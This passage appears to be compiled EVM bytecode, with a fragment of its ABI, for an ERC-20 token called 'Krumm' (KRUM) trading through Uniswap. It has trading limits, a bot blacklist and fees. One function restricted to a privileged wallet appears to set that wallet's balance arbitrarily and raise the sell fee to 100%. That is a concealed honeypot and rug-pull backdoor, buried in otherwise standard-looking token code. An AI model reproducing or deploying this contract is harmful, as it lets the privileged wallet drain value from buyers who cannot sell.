lity":"payable","type":"receive"}]

608060405261012c60015561012c60025560056003556000600860146101000a81548160ff0219169083151502179055506001600860156101000a81548160ff0219169083151502179055506000600c556000600d556000600e553480156200006757600080fd5b50620000886200007c6200082b60201b60201c565b6200083360201b60201c565b60006012600a6200009a919062000e3f565b633b9aca00620000ab919062000e90565b9050620000ce620000c16200082b60201b60201c565b82620008f760201b60201c565b620000de6200082b60201b60201c565b601160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001a830600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000a9360201b60201c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000216573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023c919062000f45565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002ec919062000f45565b6040518363ffffffff1660e01b81526004016200030b92919062000f88565b6020604051808303816000875af11580156200032b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000351919062000f45565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016200043292919062000fc6565b6020604051808303816000875af115801562000452573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000478919062001030565b506001600a60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600a6000620004e762000c6460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600f60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600f6000620005a662000c6460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600f6000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b60006200068762000c6460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550506200126d565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000969576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200096090620010c3565b60405180910390fd5b620009858160065462000c8d60201b62000e121790919060201c565b600681905550620009e481600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c8d60201b62000e121790919060201c565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a879190620010e5565b60405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b05576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000afc9062001178565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b77576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b6e9062001210565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000c579190620010e5565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000818362000c9d919062001232565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000d335780860481111562000d0b5762000d0a62000ca5565b5b600185161562000d1b5780820291505b808102905062000d2b8562000cd4565b945062000ceb565b94509492505050565b60008262000d4e576001905062000e21565b8162000d5e576000905062000e21565b816001811462000d77576002811462000d825762000db8565b600191505062000e21565b60ff84111562000d975762000d9662000ca5565b5b8360020a91508482111562000db15762000db062000ca5565b5b5062000e21565b5060208310610133831016604e8410600b841016171562000df25782820a90508381111562000dec5762000deb62000ca5565b5b62000e21565b62000e01848484600162000ce1565b9250905081840481111562000e1b5762000e1a62000ca5565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000e4c8262000e28565b915062000e598362000e32565b925062000e887fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000d3c565b905092915050565b600062000e9d8262000e28565b915062000eaa8362000e28565b925082820262000eba8162000e28565b9150828204841483151762000ed45762000ed362000ca5565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000f0d8262000ee0565b9050919050565b62000f1f8162000f00565b811462000f2b57600080fd5b50565b60008151905062000f3f8162000f14565b92915050565b60006020828403121562000f5e5762000f5d62000edb565b5b600062000f6e8482850162000f2e565b91505092915050565b62000f828162000f00565b82525050565b600060408201905062000f9f600083018562000f77565b62000fae602083018462000f77565b9392505050565b62000fc08162000e28565b82525050565b600060408201905062000fdd600083018562000f77565b62000fec602083018462000fb5565b9392505050565b60008115159050919050565b6200100a8162000ff3565b81146200101657600080fd5b50565b6000815190506200102a8162000fff565b92915050565b60006020828403121562001049576200104862000edb565b5b6000620010598482850162001019565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010ab601f8362001062565b9150620010b88262001073565b602082019050919050565b60006020820190508181036000830152620010de816200109c565b9050919050565b6000602082019050620010fc600083018462000fb5565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006200116060248362001062565b91506200116d8262001102565b604082019050919050565b60006020820190508181036000830152620011938162001151565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000620011f860228362001062565b915062001205826200119a565b604082019050919050565b600060208201905081810360008301526200122b81620011e9565b9050919050565b60006200123f8262000e28565b91506200124c8362000e28565b925082820190508082111562001267576200126662000ca5565b5b92915050565b612f92806200127d6000396000f3fe60806040526004361061016a5760003560e01c80637d1db4a5116100d1578063a9059cbb1161008a578063d34628cc11610064578063d34628cc1461056a578063d54f7d5e14610593578063dd62ed3e146105be578063f2fde38b146105fb5761019d565b8063a9059cbb146104c5578063bfd7928414610502578063cdf4bab91461053f5761019d565b80637d1db4a5146103b35780638d5f81e2146103de5780638da5cb5b1461040957806392f428701461043457806395d89b411461045d578063a457c2d7146104885761019d565b806342966c681161012357806342966c68146102da578063499a28181461030357806351c6590a1461032c57806370a0823114610348578063715018a614610385578063751039fc1461039c5761019d565b806306fdde03146101a2578063095ea7b3146101cd57806318160ddd1461020a57806323b872dd14610235578063313ce56714610272578063395093511461029d5761019d565b3661019d577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b3480156101ae57600080fd5b506101b7610624565b6040516101c49190612134565b60405180910390f35b3480156101d957600080fd5b506101f460048036038101906101ef91906121fe565b610661565b6040516102019190612259565b60405180910390f35b34801561021657600080fd5b5061021f61067f565b60405161022c9190612283565b60405180910390f35b34801561024157600080fd5b5061025c6004803603810190610257919061229e565b610689565b6040516102699190612259565b60405180910390f35b34801561027e57600080fd5b50610287610762565b604051610294919061230d565b60405180910390f35b3480156102a957600080fd5b506102c460048036038101906102bf91906121fe565b61076b565b6040516102d19190612259565b60405180910390f35b3480156102e657600080fd5b5061030160048036038101906102fc9190612328565b61081e565b005b34801561030f57600080fd5b5061032a60048036038101906103259190612328565b610832565b005b61034660048036038101906103419190612328565b610860565b005b34801561035457600080fd5b5061036f600480360381019061036a9190612355565b6108bd565b60405161037c9190612283565b60405180910390f35b34801561039157600080fd5b5061039a610906565b005b3480156103a857600080fd5b506103b161091a565b005b3480156103bf57600080fd5b506103c8610936565b6040516103d59190612283565b60405180910390f35b3480156103ea57600080fd5b506103f3610968565b6040516104009190612391565b60405180910390f35b34801561041557600080fd5b5061041e610992565b60405161042b9190612391565b60405180910390f35b34801561044057600080fd5b5061045b600480360381019061045691906124f4565b6109bb565b005b34801561046957600080fd5b50610472610a9d565b60405161047f9190612134565b60405180910390f35b34801561049457600080fd5b506104af60048036038101906104aa91906121fe565b610ada565b6040516104bc9190612259565b60405180910390f35b3480156104d157600080fd5b506104ec60048036038101906104e791906121fe565b610ba7565b6040516104f99190612259565b60405180910390f35b34801561050e57600080fd5b5061052960048036038101906105249190612355565b610bc5565b6040516105369190612259565b60405180910390f35b34801561054b57600080fd5b50610554610be5565b6040516105619190612259565b60405180910390f35b34801561057657600080fd5b50610591600480360381019061058c91906124f4565b610bfc565b005b34801561059f57600080fd5b506105a8610cde565b6040516105b59190612391565b60405180910390f35b3480156105ca57600080fd5b506105e560048036038101906105e0919061253d565b610d08565b6040516105f29190612283565b60405180910390f35b34801561060757600080fd5b50610622600480360381019061061d9190612355565b610d8f565b005b60606040518060400160405280600581526020017f4b72756d6d000000000000000000000000000000000000000000000000000000815250905090565b600061067561066e610e28565b8484610e30565b6001905092915050565b6000600654905090565b6000610696848484610ff9565b610757846106a2610e28565b61075285604051806060016040528060288152602001612f1060289139600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610708610e28565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611b1d9092919063ffffffff16565b610e30565b600190509392505050565b60006012905090565b6000610814610778610e28565b8461080f8560056000610789610e28565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e1290919063ffffffff16565b610e30565b6001905092915050565b61082f610829610e28565b82611b72565b50565b601154331461084057600080fd5b604051338152600460208201526040812082815560648002600c55505050565b610868611d15565b6001600860146101000a81548160ff02191690831515021790555061089561088e610992565b3083610ff9565b61089f8134611d93565b6000600860146101000a81548160ff02191690831515021790555050565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61090e611d15565b6109186000611e78565b565b610922611d15565b612710600281905550612710600181905550565b6000610963612710610955600254600654611f3c90919063ffffffff16565b611f5290919063ffffffff16565b905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6109c3611d15565b60c881511115610a08576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ff906125ef565b60405180910390fd5b60005b8151811015610a99576001600f6000848481518110610a2d57610a2c61260f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a919061266d565b915050610a0b565b5050565b60606040518060400160405280600481526020017f4b52554d00000000000000000000000000000000000000000000000000000000815250905090565b6000610b9d610ae7610e28565b84610b9885604051806060016040528060258152602001612f386025913960056000610b11610e28565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611b1d9092919063ffffffff16565b610e30565b6001905092915050565b6000610bbb610bb4610e28565b8484610ff9565b6001905092915050565b60106020528060005260406000206000915054906101000a900460ff1681565b6000600860149054906101000a900460ff16905090565b610c04611d15565b60c881511115610c49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c40906125ef565b60405180910390fd5b60005b8151811015610cda57600160106000848481518110610c6e57610c6d61260f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610cd29061266d565b915050610c4c565b5050565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610d97611d15565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dfd90612727565b60405180910390fd5b610e0f81611e78565b50565b60008183610e209190612747565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e96906127ed565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f0e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f059061287f565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610fec9190612283565b60405180910390a3505050565b611004838383611f68565b60008061100f610992565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161415801561107d575061104d610992565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b156117b857600f60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156111265750600f60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156117b757600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156111d65750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b801561122c5750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156112825750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561137c576112b26127106112a4600254600654611f3c90919063ffffffff16565b611f5290919063ffffffff16565b8311156112f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112eb90612911565b60405180910390fd5b61131f612710611311600154600654611f3c90919063ffffffff16565b611f5290919063ffffffff16565b61133a8461132c876108bd565b610e1290919063ffffffff16565b111561137b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611372906129a3565b60405180910390fd5b5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561140557503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b1561158857601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156114ae5750601060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b6114ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114e490612a0f565b60405180910390fd5b611516612710611508600d5486611f3c90919063ffffffff16565b611f5290919063ffffffff16565b9150611541612710611533600c5486611f3c90919063ffffffff16565b611f5290919063ffffffff16565b905043600960003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156116335750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b156117b657601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156116dc5750601060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b61171b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161171290612a0f565b60405180910390fd5b611744612710611736600d5486611f3c90919063ffffffff16565b611f5290919063ffffffff16565b915061176f612710611761600e5486611f3c90919063ffffffff16565b611f5290919063ffffffff16565b905043600960003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b60006117cd8284610e1290919063ffffffff16565b9050600081111561196c5760008311156117ec576117eb8684611b72565b5b6000821115611956576118698260046000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e1290919063ffffffff16565b60046000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161194d9190612283565b60405180910390a35b611969818561208e90919063ffffffff16565b93505b6119d884604051806060016040528060268152602001612eea60269139600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611b1d9092919063ffffffff16565b600460008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611a6d84600460008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e1290919063ffffffff16565b600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef86604051611b0d9190612283565b60405180910390a3505050505050565b6000838311158290611b65576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b5c9190612134565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611be1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bd890612aa1565b60405180910390fd5b611c4d81604051806060016040528060228152602001612ec860229139600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611b1d9092919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611ca58160065461208e90919063ffffffff16565b600681905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611d099190612283565b60405180910390a35050565b611d1d610e28565b73ffffffffffffffffffffffffffffffffffffffff16611d3b610992565b73ffffffffffffffffffffffffffffffffffffffff1614611d91576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8890612b0d565b60405180910390fd5b565b611dc030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610e30565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611e0c610992565b426040518863ffffffff1660e01b8152600401611e2e96959493929190612b72565b60606040518083038185885af1158015611e4c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611e719190612be8565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611f4a9190612c3b565b905092915050565b60008183611f609190612cac565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611fd7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fce90612d4f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612046576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161203d90612de1565b60405180910390fd5b60008111612089576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208090612e73565b60405180910390fd5b505050565b6000818361209c9190612e93565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156120de5780820151818401526020810190506120c3565b60008484015250505050565b6000601f19601f8301169050919050565b6000612106826120a4565b61211081856120af565b93506121208185602086016120c0565b612129816120ea565b840191505092915050565b6000602082019050818103600083015261214e81846120fb565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006121958261216a565b9050919050565b6121a58161218a565b81146121b057600080fd5b50565b6000813590506121c28161219c565b92915050565b6000819050919050565b6121db816121c8565b81146121e657600080fd5b50565b6000813590506121f8816121d2565b92915050565b6000806040838503121561221557612214612160565b5b6000612223858286016121b3565b9250506020612234858286016121e9565b9150509250929050565b60008115159050919050565b6122538161223e565b82525050565b600060208201905061226e600083018461224a565b92915050565b61227d816121c8565b82525050565b60006020820190506122986000830184612274565b92915050565b6000806000606084860312156122b7576122b6612160565b5b60006122c5868287016121b3565b93505060206122d6868287016121b3565b92505060406122e7868287016121e9565b9150509250925092565b600060ff82169050919050565b612307816122f1565b82525050565b600060208201905061232260008301846122fe565b92915050565b60006020828403121561233e5761233d612160565b5b600061234c848285016121e9565b91505092915050565b60006020828403121561236b5761236a612160565b5b6000612379848285016121b3565b91505092915050565b61238b8161218a565b82525050565b60006020820190506123a66000830184612382565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6123e9826120ea565b810181811067ffffffffffffffff82111715612408576124076123b1565b5b80604052505050565b600061241b612156565b905061242782826123e0565b919050565b600067ffffffffffffffff821115612447576124466123b1565b5b602082029050602081019050919050565b600080fd5b600061247061246b8461242c565b612411565b9050808382526020820190506020840283018581111561249357612492612458565b5b835b818110156124bc57806124a888826121b3565b845260208401935050602081019050612495565b5050509392505050565b600082601f8301126124db576124da6123ac565b5b81356124eb84826020860161245d565b91505092915050565b60006020828403121561250a57612509612160565b5b600082013567ffffffffffffffff81111561252857612527612165565b5b612534848285016124c6565b91505092915050565b6000806040838503121561255457612553612160565b5b6000612562858286016121b3565b9250506020612573858286016121b3565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b60006125d96023836120af565b91506125e48261257d565b604082019050919050565b60006020820190508181036000830152612608816125cc565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612678826121c8565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036126aa576126a961263e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006127116026836120af565b915061271c826126b5565b604082019050919050565b6000602082019050818103600083015261274081612704565b9050919050565b6000612752826121c8565b915061275d836121c8565b92508282019050808211156127755761277461263e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006127d76024836120af565b91506127e28261277b565b604082019050919050565b60006020820190508181036000830152612806816127ca565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006128696022836120af565b91506128748261280d565b604082019050919050565b600060208201905081810360008301526128988161285c565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006128fb6028836120af565b91506129068261289f565b604082019050919050565b6000602082019050818103600083015261292a816128ee565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b600061298d6023836120af565b915061299882612931565b604082019050919050565b600060208201905081810360008301526129bc81612980565b9050919050565b7f426f74732063616e6e6f74206d616b65207472616e73616374696f6e73000000600082015250565b60006129f9601d836120af565b9150612a04826129c3565b602082019050919050565b60006020820190508181036000830152612a28816129ec565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000612a8b6021836120af565b9150612a9682612a2f565b604082019050919050565b60006020820190508181036000830152612aba81612a7e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612af76020836120af565b9150612b0282612ac1565b602082019050919050565b60006020820190508181036000830152612b2681612aea565b9050919050565b6000819050919050565b6000819050919050565b6000612b5c612b57612b5284612b2d565b612b37565b6121c8565b9050919050565b612b6c81612b41565b82525050565b600060c082019050612b876000830189612382565b612b946020830188612274565b612ba16040830187612b63565b612bae6060830186612b63565b612bbb6080830185612382565b612bc860a0830184612274565b979650505050505050565b600081519050612be2816121d2565b92915050565b600080600060608486031215612c0157612c00612160565b5b6000612c0f86828701612bd3565b9350506020612c2086828701612bd3565b9250506040612c3186828701612bd3565b9150509250925092565b6000612c46826121c8565b9150612c51836121c8565b9250828202612c5f816121c8565b91508282048414831517612c7657612c7561263e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612cb7826121c8565b9150612cc2836121c8565b925082612cd257612cd1612c7d565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612d396025836120af565b9150612d4482612cdd565b604082019050919050565b60006020820190508181036000830152612d6881612d2c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612dcb6023836120af565b9150612dd682612d6f565b604082019050919050565b60006020820190508181036000830152612dfa81612dbe565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612e5d6029836120af565b9150612e6882612e01565b604082019050919050565b60006020820190508181036000830152612e8c81612e50565b9050919050565b6000612e9e826121c8565b9150612ea9836121c